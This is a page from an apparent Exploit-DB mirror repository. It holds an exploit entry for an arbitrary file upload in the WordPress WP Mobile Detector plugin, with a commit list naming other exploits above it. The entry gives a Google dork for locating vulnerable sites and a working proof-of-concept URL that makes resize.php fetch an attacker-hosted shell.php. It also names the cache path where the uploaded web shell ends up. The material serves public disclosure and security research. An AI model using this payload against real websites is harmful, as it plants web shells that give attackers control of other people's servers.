bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39891.txt
Offensive Security 62962d90b0 DB: 2016-06-07 
16 new exploits

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)

Linux Kernel  2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)
Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root

WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities
Dream Gallery 1.0 - CSRF Add Admin Exploit
Apache Continuum 1.4.2 - Multiple Vulnerabilities
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit
Valve Steam 3.42.16.13 - Local Privilege Escalation
ArticleSetup 1.00 - CSRF Change Admin Password
Electroweb Online Examination System 1.0 - SQL Injection
WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload
WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS
WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection
WordPress Newspaper Theme 6.7.1 - Privilege Escalation
WordPress Uncode Theme 1.3.1 - Arbitrary File Upload
WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection
Notilus Travel Solution Software 2012 R3 - SQL Injection
rConfig 3.1.1 - Local File Inclusion
Nagios XI 5.2.7 - Multiple Vulnerabilities
2016-06-07 05:07:41 +00:00

34 lines
1.1 KiB
Text
Executable file
Raw Blame History

#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to:
[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
and it will get saved in directory:
/wp-content/plugins/wp-mobile-detector/cache/shell.php
Reference in a new issue View git blame Copy permalink